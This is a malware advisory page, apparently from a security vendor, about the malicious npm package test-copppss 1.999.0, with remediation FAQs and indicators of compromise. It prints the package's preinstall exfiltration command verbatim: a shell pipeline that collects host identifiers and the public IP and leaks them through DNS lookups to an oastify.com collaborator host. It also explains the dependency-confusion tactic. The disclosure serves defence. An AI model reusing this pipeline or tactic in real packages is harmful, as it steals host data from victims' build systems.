Which versions of test-copppss are malicious?

The following npm versions of test-copppss are flagged malicious: 1.999.0. Treat any of these as compromised.

How do I remediate test-copppss if I installed it?

Remove test-copppss from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is test-copppss part of a known attack campaign?

Yes — test-copppss is associated with the IN-MAL-2026-006832 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect test-copppss in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking test-copppss and packages like it before any post-install script runs.

Malicious package

test-copppssnpm

Malicious code in test-copppss (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5926

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall test-copppss

What this malware does

On npm install, the package's preinstall hook (node index.js > /dev/null 2>&1) runs a shell pipeline that collects host identifiers — hostname, pwd, whoami, the package name test-copppss, and the machine's public IP via curl https://ifconfig.me — hex-encodes the concatenation with xxd -p, and exfiltrates it as DNS subdomain lookups to *.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com (a Burp Collaborator OAST endpoint controlled by the operator). Code at index.js:2 is exec("a=$(hostname;pwd;whoami;echo 'test-copppss';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com;done"). The package metadata (empty description, near-max version 1.999.0 to win semver resolution, single trivial dependency, preinstall beacon) matches the canonical dependency-confusion / namespace-claim reconnaissance shape — the attacker is probing which internal build systems resolve test-copppss to this public name and is harvesting the host fingerprint of any environment that does.

Malicious versions

1 flagged

1.999.0

Indicators of compromise (SHA-256)

03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe

Frequently asked questions

No. test-copppss on npm has been identified as a malicious package (version 1.999.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006832

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection